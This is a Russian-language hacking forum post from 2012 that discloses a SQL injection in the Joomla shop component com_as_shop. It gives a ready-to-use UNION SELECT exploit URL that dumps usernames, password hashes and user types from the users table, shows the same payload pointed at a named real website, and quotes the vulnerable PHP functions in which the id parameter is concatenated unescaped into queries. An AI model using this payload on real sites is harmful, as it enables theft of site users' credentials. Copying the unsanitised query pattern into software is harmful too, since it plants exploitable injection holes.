15.01.2012, 20:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
com_as_shop
MySQL Injection в Joomla
Уязвимость в модуле " com_as_shop".
Exploit:
Код:
http://site.ru/index.php?option=com_as_shop&cmd=gbc&id=-1+union+select+1,concat(username,0x3a,password,0x3a,usertype),3+from+jos_users+--+
Уязвимый параметр: id
Example:
Сообщение от None
_http://www.scandimix.ru/index.php?option=com_as_shop&cmd=gbc&id=-10+union+select+1,concat(username,0x3a,password,0x 3a,usertype),3+from+s15092010_users+--+
Уязвимые места в коде: components/com_as_shop/controllers/goods.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]getGNameById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/// Joomla ver28.10.2010
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();;
[/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__as_goods` WHERE `id` ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getGArticleById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/// Joomla ver28.10.2010
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();;
[/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__as_goods` WHERE `id` ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getGPriceById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/// Joomla ver28.10.2010
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();;
[/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__as_goods` WHERE `id` ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]price[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
как видем версия компанента датирована от 28.10.2010
-----------------------------------------------------------
(c) By winstrool
|
|
|